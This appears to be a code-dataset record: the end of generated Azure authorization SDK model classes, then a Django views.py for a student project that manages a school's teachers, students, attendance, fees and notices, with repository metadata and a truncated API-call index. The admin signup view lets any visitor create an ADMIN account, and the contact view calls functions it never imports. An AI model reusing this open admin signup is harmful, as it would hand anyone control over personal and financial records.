:type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation] """ _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'resource_types': {'key': 'resourceTypes', 'type': '[ResourceType]'}, 'operations': {'key': 'operations', 'type': '[ProviderOperation]'}, } def __init__( self, *, id: Optional[str] = None, name: Optional[str] = None, type: Optional[str] = None, display_name: Optional[str] = None, resource_types: Optional[List["ResourceType"]] = None, operations: Optional[List["ProviderOperation"]] = None, **kwargs ): super(ProviderOperationsMetadata, self).__init__(**kwargs) self.id = id self.name = name self.type = type self.display_name = display_name self.resource_types = resource_types self.operations = operations class ProviderOperationsMetadataListResult(msrest.serialization.Model): """Provider operations metadata list. :param value: The list of providers. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperationsMetadata] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[ProviderOperationsMetadata]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["ProviderOperationsMetadata"]] = None, next_link: Optional[str] = None, **kwargs ): super(ProviderOperationsMetadataListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class ResourceType(msrest.serialization.Model): """Resource Type. :param name: The resource type name. :type name: str :param display_name: The resource type display name. :type display_name: str :param operations: The resource type operations. :type operations: list[~azure.mgmt.authorization.v2018_01_01_preview.models.ProviderOperation] """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'operations': {'key': 'operations', 'type': '[ProviderOperation]'}, } def __init__( self, *, name: Optional[str] = None, display_name: Optional[str] = None, operations: Optional[List["ProviderOperation"]] = None, **kwargs ): super(ResourceType, self).__init__(**kwargs) self.name = name self.display_name = display_name self.operations = operations class RoleAssignment(msrest.serialization.Model): """Role Assignments. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The role assignment ID. :vartype id: str :ivar name: The role assignment name. :vartype name: str :ivar type: The role assignment type. :vartype type: str :param scope: The role assignment scope. :type scope: str :param role_definition_id: The role definition ID. :type role_definition_id: str :param principal_id: The principal ID. :type principal_id: str :param can_delegate: The Delegation flag for the role assignment. 
:type can_delegate: bool """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'scope': {'key': 'properties.scope', 'type': 'str'}, 'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'}, 'principal_id': {'key': 'properties.principalId', 'type': 'str'}, 'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'}, } def __init__( self, *, scope: Optional[str] = None, role_definition_id: Optional[str] = None, principal_id: Optional[str] = None, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignment, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.scope = scope self.role_definition_id = role_definition_id self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentCreateParameters(msrest.serialization.Model): """Role assignment create parameters. All required parameters must be populated in order to send to Azure. :param role_definition_id: Required. The role definition ID used in the role assignment. :type role_definition_id: str :param principal_id: Required. The principal ID assigned to the role. This maps to the ID inside the Active Directory. It can point to a user, service principal, or security group. :type principal_id: str :param can_delegate: The delegation flag used for creating a role assignment. :type can_delegate: bool """ _validation = { 'role_definition_id': {'required': True}, 'principal_id': {'required': True}, } _attribute_map = { 'role_definition_id': {'key': 'properties.roleDefinitionId', 'type': 'str'}, 'principal_id': {'key': 'properties.principalId', 'type': 'str'}, 'can_delegate': {'key': 'properties.canDelegate', 'type': 'bool'}, } def __init__( self, *, role_definition_id: str, principal_id: str, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignmentCreateParameters, self).__init__(**kwargs) self.role_definition_id = role_definition_id self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentFilter(msrest.serialization.Model): """Role Assignments filter. :param principal_id: Returns role assignment of the specific principal. :type principal_id: str :param can_delegate: The Delegation flag for the role assignment. :type can_delegate: bool """ _attribute_map = { 'principal_id': {'key': 'principalId', 'type': 'str'}, 'can_delegate': {'key': 'canDelegate', 'type': 'bool'}, } def __init__( self, *, principal_id: Optional[str] = None, can_delegate: Optional[bool] = None, **kwargs ): super(RoleAssignmentFilter, self).__init__(**kwargs) self.principal_id = principal_id self.can_delegate = can_delegate class RoleAssignmentListResult(msrest.serialization.Model): """Role assignment list operation result. :param value: Role assignment list. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleAssignment] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[RoleAssignment]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["RoleAssignment"]] = None, next_link: Optional[str] = None, **kwargs ): super(RoleAssignmentListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link class RoleDefinition(msrest.serialization.Model): """Role definition. 
Variables are only populated by the server, and will be ignored when sending a request. :ivar id: The role definition ID. :vartype id: str :ivar name: The role definition name. :vartype name: str :ivar type: The role definition type. :vartype type: str :param role_name: The role name. :type role_name: str :param description: The role definition description. :type description: str :param role_type: The role type. :type role_type: str :param permissions: Role definition permissions. :type permissions: list[~azure.mgmt.authorization.v2018_01_01_preview.models.Permission] :param assignable_scopes: Role definition assignable scopes. :type assignable_scopes: list[str] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'role_name': {'key': 'properties.roleName', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'role_type': {'key': 'properties.type', 'type': 'str'}, 'permissions': {'key': 'properties.permissions', 'type': '[Permission]'}, 'assignable_scopes': {'key': 'properties.assignableScopes', 'type': '[str]'}, } def __init__( self, *, role_name: Optional[str] = None, description: Optional[str] = None, role_type: Optional[str] = None, permissions: Optional[List["Permission"]] = None, assignable_scopes: Optional[List[str]] = None, **kwargs ): super(RoleDefinition, self).__init__(**kwargs) self.id = None self.name = None self.type = None self.role_name = role_name self.description = description self.role_type = role_type self.permissions = permissions self.assignable_scopes = assignable_scopes class RoleDefinitionFilter(msrest.serialization.Model): """Role Definitions filter. :param role_name: Returns role definition with the specific name. :type role_name: str :param type: Returns role definition with the specific type. :type type: str """ _attribute_map = { 'role_name': {'key': 'roleName', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, } def __init__( self, *, role_name: Optional[str] = None, type: Optional[str] = None, **kwargs ): super(RoleDefinitionFilter, self).__init__(**kwargs) self.role_name = role_name self.type = type class RoleDefinitionListResult(msrest.serialization.Model): """Role definition list operation result. :param value: Role definition list. :type value: list[~azure.mgmt.authorization.v2018_01_01_preview.models.RoleDefinition] :param next_link: The URL to use for getting the next set of results. :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[RoleDefinition]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: Optional[List["RoleDefinition"]] = None, next_link: Optional[str] = None, **kwargs ): super(RoleDefinitionListResult, self).__init__(**kwargs) self.value = value self.next_link = next_link
[]
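A brief, hypothetical sketch showing how the generated msrest models above are instantiated; the identifiers are placeholders, and serialize() is inherited from the msrest.serialization.Model base class:

# Hypothetical usage sketch -- identifiers are placeholders.
from azure.mgmt.authorization.v2018_01_01_preview.models import (
    RoleAssignmentCreateParameters,
)

params = RoleAssignmentCreateParameters(
    role_definition_id="/subscriptions/<sub>/providers/Microsoft.Authorization/roleDefinitions/<guid>",
    principal_id="<principal-object-id>",
    can_delegate=False,
)
print(params.serialize())  # provided by msrest.serialization.Model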
pa-one-patel/college_managenment
school/views.py
be6f6dcac1f7e01f71d95f445e2118e8eec3fe3a
from django.shortcuts import render,redirect,reverse
from . import forms,models
from django.db.models import Sum
from django.contrib.auth.models import Group
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required,user_passes_test


def home_view(request):
    if request.user.is_authenticated:
        return HttpResponseRedirect('afterlogin')
    return render(request,'school/index.html')


#for showing signup/login button for teacher(by sumit)
def adminclick_view(request):
    if request.user.is_authenticated:
        return HttpResponseRedirect('afterlogin')
    return render(request,'school/adminclick.html')


#for showing signup/login button for teacher(by sumit)
def teacherclick_view(request):
    if request.user.is_authenticated:
        return HttpResponseRedirect('afterlogin')
    return render(request,'school/teacherclick.html')


#for showing signup/login button for student(by sumit)
def studentclick_view(request):
    if request.user.is_authenticated:
        return HttpResponseRedirect('afterlogin')
    return render(request,'school/studentclick.html')


def admin_signup_view(request):
    form=forms.AdminSigupForm()
    if request.method=='POST':
        form=forms.AdminSigupForm(request.POST)
        if form.is_valid():
            user=form.save()
            user.set_password(user.password)
            user.save()
            my_admin_group = Group.objects.get_or_create(name='ADMIN')
            my_admin_group[0].user_set.add(user)
            return HttpResponseRedirect('adminlogin')
    return render(request,'school/adminsignup.html',{'form':form})


def student_signup_view(request):
    form1=forms.StudentUserForm()
    form2=forms.StudentExtraForm()
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.StudentUserForm(request.POST)
        form2=forms.StudentExtraForm(request.POST)
        if form1.is_valid() and form2.is_valid():
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.user=user
            user2=f2.save()
            my_student_group = Group.objects.get_or_create(name='STUDENT')
            my_student_group[0].user_set.add(user)
        return HttpResponseRedirect('studentlogin')
    return render(request,'school/studentsignup.html',context=mydict)


def teacher_signup_view(request):
    form1=forms.TeacherUserForm()
    form2=forms.TeacherExtraForm()
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.TeacherUserForm(request.POST)
        form2=forms.TeacherExtraForm(request.POST)
        if form1.is_valid() and form2.is_valid():
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.user=user
            user2=f2.save()
            my_teacher_group = Group.objects.get_or_create(name='TEACHER')
            my_teacher_group[0].user_set.add(user)
        return HttpResponseRedirect('teacherlogin')
    return render(request,'school/teachersignup.html',context=mydict)


#for checking user is techer , student or admin(by sumit)
def is_admin(user):
    return user.groups.filter(name='ADMIN').exists()
def is_teacher(user):
    return user.groups.filter(name='TEACHER').exists()
def is_student(user):
    return user.groups.filter(name='STUDENT').exists()


def afterlogin_view(request):
    if is_admin(request.user):
        return redirect('admin-dashboard')
    elif is_teacher(request.user):
        accountapproval=models.TeacherExtra.objects.all().filter(user_id=request.user.id,status=True)
        if accountapproval:
            return redirect('teacher-dashboard')
        else:
            return render(request,'school/teacher_wait_for_approval.html')
    elif is_student(request.user):
        accountapproval=models.StudentExtra.objects.all().filter(user_id=request.user.id,status=True)
        if accountapproval:
            return redirect('student-dashboard')
        else:
            return render(request,'school/student_wait_for_approval.html')


#for dashboard of adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_dashboard_view(request):
    teachercount=models.TeacherExtra.objects.all().filter(status=True).count()
    pendingteachercount=models.TeacherExtra.objects.all().filter(status=False).count()

    studentcount=models.StudentExtra.objects.all().filter(status=True).count()
    pendingstudentcount=models.StudentExtra.objects.all().filter(status=False).count()

    teachersalary=models.TeacherExtra.objects.filter(status=True).aggregate(Sum('salary'))
    pendingteachersalary=models.TeacherExtra.objects.filter(status=False).aggregate(Sum('salary'))

    studentfee=models.StudentExtra.objects.filter(status=True).aggregate(Sum('fee',default=0))
    pendingstudentfee=models.StudentExtra.objects.filter(status=False).aggregate(Sum('fee'))

    notice=models.Notice.objects.all()

    #aggregate function return dictionary so fetch data from dictionay(by sumit)
    mydict={
        'teachercount':teachercount,
        'pendingteachercount':pendingteachercount,
        'studentcount':studentcount,
        'pendingstudentcount':pendingstudentcount,
        'teachersalary':teachersalary['salary__sum'],
        'pendingteachersalary':pendingteachersalary['salary__sum'],
        'studentfee':studentfee['fee__sum'],
        'pendingstudentfee':pendingstudentfee['fee__sum'],
        'notice':notice
    }
    return render(request,'school/admin_dashboard.html',context=mydict)


#for teacher sectionnnnnnnn by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_teacher_view(request):
    return render(request,'school/admin_teacher.html')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_add_teacher_view(request):
    form1=forms.TeacherUserForm()
    form2=forms.TeacherExtraForm()
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.TeacherUserForm(request.POST)
        form2=forms.TeacherExtraForm(request.POST)
        if form1.is_valid() and form2.is_valid():
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.user=user
            f2.status=True
            f2.save()
            my_teacher_group = Group.objects.get_or_create(name='TEACHER')
            my_teacher_group[0].user_set.add(user)
        return HttpResponseRedirect('admin-teacher')
    return render(request,'school/admin_add_teacher.html',context=mydict)

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_teacher_view(request):
    teachers=models.TeacherExtra.objects.all().filter(status=True)
    return render(request,'school/admin_view_teacher.html',{'teachers':teachers})

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_approve_teacher_view(request):
    teachers=models.TeacherExtra.objects.all().filter(status=False)
    return render(request,'school/admin_approve_teacher.html',{'teachers':teachers})

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def approve_teacher_view(request,pk):
    teacher=models.TeacherExtra.objects.get(id=pk)
    teacher.status=True
    teacher.save()
    return redirect(reverse('admin-approve-teacher'))

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def delete_teacher_view(request,pk):
    teacher=models.TeacherExtra.objects.get(id=pk)
    user=models.User.objects.get(id=teacher.user_id)
    user.delete()
    teacher.delete()
    return redirect('admin-approve-teacher')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def delete_teacher_from_school_view(request,pk):
    teacher=models.TeacherExtra.objects.get(id=pk)
    user=models.User.objects.get(id=teacher.user_id)
    user.delete()
    teacher.delete()
    return redirect('admin-view-teacher')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def update_teacher_view(request,pk):
    teacher=models.TeacherExtra.objects.get(id=pk)
    user=models.User.objects.get(id=teacher.user_id)
    form1=forms.TeacherUserForm(instance=user)
    form2=forms.TeacherExtraForm(instance=teacher)
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.TeacherUserForm(request.POST,instance=user)
        form2=forms.TeacherExtraForm(request.POST,instance=teacher)
        print(form1)
        if form1.is_valid() and form2.is_valid():
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.status=True
            f2.save()
            return redirect('admin-view-teacher')
    return render(request,'school/admin_update_teacher.html',context=mydict)

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_teacher_salary_view(request):
    teachers=models.TeacherExtra.objects.all()
    return render(request,'school/admin_view_teacher_salary.html',{'teachers':teachers})


#for student by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_student_view(request):
    return render(request,'school/admin_student.html')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_add_student_view(request):
    form1=forms.StudentUserForm()
    form2=forms.StudentExtraForm()
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.StudentUserForm(request.POST)
        form2=forms.StudentExtraForm(request.POST)
        if form1.is_valid() and form2.is_valid():
            print("form is valid")
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.user=user
            f2.status=True
            f2.save()
            my_student_group = Group.objects.get_or_create(name='STUDENT')
            my_student_group[0].user_set.add(user)
        else:
            print("form is invalid")
        return HttpResponseRedirect('admin-student')
    return render(request,'school/admin_add_student.html',context=mydict)

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_student_view(request):
    students=models.StudentExtra.objects.all().filter(status=True)
    return render(request,'school/admin_view_student.html',{'students':students})

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def delete_student_from_school_view(request,pk):
    student=models.StudentExtra.objects.get(id=pk)
    user=models.User.objects.get(id=student.user_id)
    user.delete()
    student.delete()
    return redirect('admin-view-student')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def delete_student_view(request,pk):
    student=models.StudentExtra.objects.get(id=pk)
    user=models.User.objects.get(id=student.user_id)
    user.delete()
    student.delete()
    return redirect('admin-approve-student')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def update_student_view(request,pk):
    student=models.StudentExtra.objects.get(id=pk)
    user=models.User.objects.get(id=student.user_id)
    form1=forms.StudentUserForm(instance=user)
    form2=forms.StudentExtraForm(instance=student)
    mydict={'form1':form1,'form2':form2}
    if request.method=='POST':
        form1=forms.StudentUserForm(request.POST,instance=user)
        form2=forms.StudentExtraForm(request.POST,instance=student)
        print(form1)
        if form1.is_valid() and form2.is_valid():
            user=form1.save()
            user.set_password(user.password)
            user.save()
            f2=form2.save(commit=False)
            f2.status=True
            f2.save()
            return redirect('admin-view-student')
    return render(request,'school/admin_update_student.html',context=mydict)

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_approve_student_view(request):
    students=models.StudentExtra.objects.all().filter(status=False)
    return render(request,'school/admin_approve_student.html',{'students':students})

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def approve_student_view(request,pk):
    students=models.StudentExtra.objects.get(id=pk)
    students.status=True
    students.save()
    return redirect(reverse('admin-approve-student'))

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_student_fee_view(request):
    students=models.StudentExtra.objects.all()
    return render(request,'school/admin_view_student_fee.html',{'students':students})


#attendance related viewwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_attendance_view(request):
    return render(request,'school/admin_attendance.html')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_take_attendance_view(request,cl):
    students=models.StudentExtra.objects.all().filter(cl=cl)
    print(students)
    aform=forms.AttendanceForm()
    if request.method=='POST':
        form=forms.AttendanceForm(request.POST)
        if form.is_valid():
            Attendances=request.POST.getlist('present_status')
            date=form.cleaned_data['date']
            for i in range(len(Attendances)):
                AttendanceModel=models.Attendance()
                AttendanceModel.cl=cl
                AttendanceModel.date=date
                AttendanceModel.present_status=Attendances[i]
                AttendanceModel.roll=students[i].roll
                AttendanceModel.save()
            return redirect('admin-attendance')
        else:
            print('form invalid')
    return render(request,'school/admin_take_attendance.html',{'students':students,'aform':aform})

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_attendance_view(request,cl):
    form=forms.AskDateForm()
    if request.method=='POST':
        form=forms.AskDateForm(request.POST)
        if form.is_valid():
            date=form.cleaned_data['date']
            attendancedata=models.Attendance.objects.all().filter(date=date,cl=cl)
            studentdata=models.StudentExtra.objects.all().filter(cl=cl)
            mylist=zip(attendancedata,studentdata)
            return render(request,'school/admin_view_attendance_page.html',{'cl':cl,'mylist':mylist,'date':date})
        else:
            print('form invalid')
    return render(request,'school/admin_view_attendance_ask_date.html',{'cl':cl,'form':form})


#fee related view by adminnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_fee_view(request):
    return render(request,'school/admin_fee.html')

@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_view_fee_view(request,cl):
    feedetails=models.StudentExtra.objects.all().filter(cl=cl)
    return render(request,'school/admin_view_fee.html',{'feedetails':feedetails,'cl':cl})


#notice related viewsssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss(by sumit)
@login_required(login_url='adminlogin')
@user_passes_test(is_admin)
def admin_notice_view(request):
    form=forms.NoticeForm()
    if request.method=='POST':
        form=forms.NoticeForm(request.POST)
        if form.is_valid():
            form=form.save(commit=False)
            form.by=request.user.first_name
            form.save()
            return redirect('admin-dashboard')
    return render(request,'school/admin_notice.html',{'form':form})


#for TEACHER LOGIN SECTIONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN(by sumit)
@login_required(login_url='teacherlogin')
@user_passes_test(is_teacher)
def teacher_dashboard_view(request):
    teacherdata=models.TeacherExtra.objects.all().filter(status=True,user_id=request.user.id)
    notice=models.Notice.objects.all()
    mydict={
        'salary':teacherdata[0].salary,
        'mobile':teacherdata[0].mobile,
        'date':teacherdata[0].joindate,
        'notice':notice
    }
    return render(request,'school/teacher_dashboard.html',context=mydict)

@login_required(login_url='teacherlogin')
@user_passes_test(is_teacher)
def teacher_attendance_view(request):
    return render(request,'school/teacher_attendance.html')

@login_required(login_url='teacherlogin')
@user_passes_test(is_teacher)
def teacher_take_attendance_view(request,cl):
    students=models.StudentExtra.objects.all().filter(cl=cl)
    aform=forms.AttendanceForm()
    if request.method=='POST':
        form=forms.AttendanceForm(request.POST)
        if form.is_valid():
            Attendances=request.POST.getlist('present_status')
            date=form.cleaned_data['date']
            for i in range(len(Attendances)):
                AttendanceModel=models.Attendance()
                AttendanceModel.cl=cl
                AttendanceModel.date=date
                AttendanceModel.present_status=Attendances[i]
                AttendanceModel.roll=students[i].roll
                AttendanceModel.save()
            return redirect('teacher-attendance')
        else:
            print('form invalid')
    return render(request,'school/teacher_take_attendance.html',{'students':students,'aform':aform})

@login_required(login_url='teacherlogin')
@user_passes_test(is_teacher)
def teacher_view_attendance_view(request,cl):
    form=forms.AskDateForm()
    if request.method=='POST':
        form=forms.AskDateForm(request.POST)
        if form.is_valid():
            date=form.cleaned_data['date']
            attendancedata=models.Attendance.objects.all().filter(date=date,cl=cl)
            studentdata=models.StudentExtra.objects.all().filter(cl=cl)
            mylist=zip(attendancedata,studentdata)
            return render(request,'school/teacher_view_attendance_page.html',{'cl':cl,'mylist':mylist,'date':date})
        else:
            print('form invalid')
    return render(request,'school/teacher_view_attendance_ask_date.html',{'cl':cl,'form':form})

@login_required(login_url='teacherlogin')
@user_passes_test(is_teacher)
def teacher_notice_view(request):
    form=forms.NoticeForm()
    if request.method=='POST':
        form=forms.NoticeForm(request.POST)
        if form.is_valid():
            form=form.save(commit=False)
            form.by=request.user.first_name
            form.save()
            return redirect('teacher-dashboard')
        else:
            print('form invalid')
    return render(request,'school/teacher_notice.html',{'form':form})


#FOR STUDENT AFTER THEIR Loginnnnnnnnnnnnnnnnnnnnn(by sumit)
@login_required(login_url='studentlogin')
@user_passes_test(is_student)
def student_dashboard_view(request):
    studentdata=models.StudentExtra.objects.all().filter(status=True,user_id=request.user.id)
    notice=models.Notice.objects.all()
    mydict={
        'roll':studentdata[0].roll,
        'mobile':studentdata[0].mobile,
        'fee':studentdata[0].fee,
        'notice':notice
    }
    return render(request,'school/student_dashboard.html',context=mydict)

@login_required(login_url='studentlogin')
@user_passes_test(is_student)
def student_attendance_view(request):
    form=forms.AskDateForm()
    if request.method=='POST':
        form=forms.AskDateForm(request.POST)
        if form.is_valid():
            date=form.cleaned_data['date']
            studentdata=models.StudentExtra.objects.all().filter(user_id=request.user.id,status=True)
            attendancedata=models.Attendance.objects.all().filter(date=date,cl=studentdata[0].cl,roll=studentdata[0].roll)
            mylist=zip(attendancedata,studentdata)
            return render(request,'school/student_view_attendance_page.html',{'mylist':mylist,'date':date})
        else:
            print('form invalid')
    return render(request,'school/student_view_attendance_ask_date.html',{'form':form})


# for aboutus and contact ussssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss (by sumit)
def aboutus_view(request):
    return render(request,'school/aboutus.html')

# NOTE: send_mail and EMAIL_HOST_USER are used below but are never imported in this file;
# contactus_view would need e.g. `from django.core.mail import send_mail` plus an
# EMAIL_HOST_USER import from the project's settings module to actually work.
def contactus_view(request):
    sub = forms.ContactusForm()
    if request.method == 'POST':
        sub = forms.ContactusForm(request.POST)
        if sub.is_valid():
            email = sub.cleaned_data['Email']
            name=sub.cleaned_data['Name']
            message = sub.cleaned_data['Message']
            send_mail(str(name)+' || '+str(email),message, EMAIL_HOST_USER, ['[email protected]'], fail_silently = False)
            return render(request, 'school/contactussuccess.html')
    return render(request, 'school/contactus.html', {'form':sub})
[((136, 1, 136, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((137, 1, 137, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(137, 18, 137, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((181, 1, 181, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((182, 1, 182, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(182, 18, 182, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((186, 1, 186, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((187, 1, 187, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(187, 18, 187, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((212, 1, 212, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((213, 1, 213, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(213, 18, 213, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((219, 1, 219, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((220, 1, 220, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(220, 18, 220, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((226, 1, 226, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((227, 1, 227, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(227, 18, 227, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((235, 1, 235, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((236, 1, 236, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(236, 18, 236, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((245, 1, 245, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((246, 1, 246, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(246, 18, 246, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((255, 1, 255, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((256, 1, 256, 27), 
'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(256, 18, 256, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((280, 1, 280, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((281, 1, 281, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(281, 18, 281, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((293, 1, 293, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((294, 1, 294, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(294, 18, 294, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((299, 1, 299, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((300, 1, 300, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(300, 18, 300, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((327, 1, 327, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((328, 1, 328, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(328, 18, 328, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((334, 1, 334, 39), 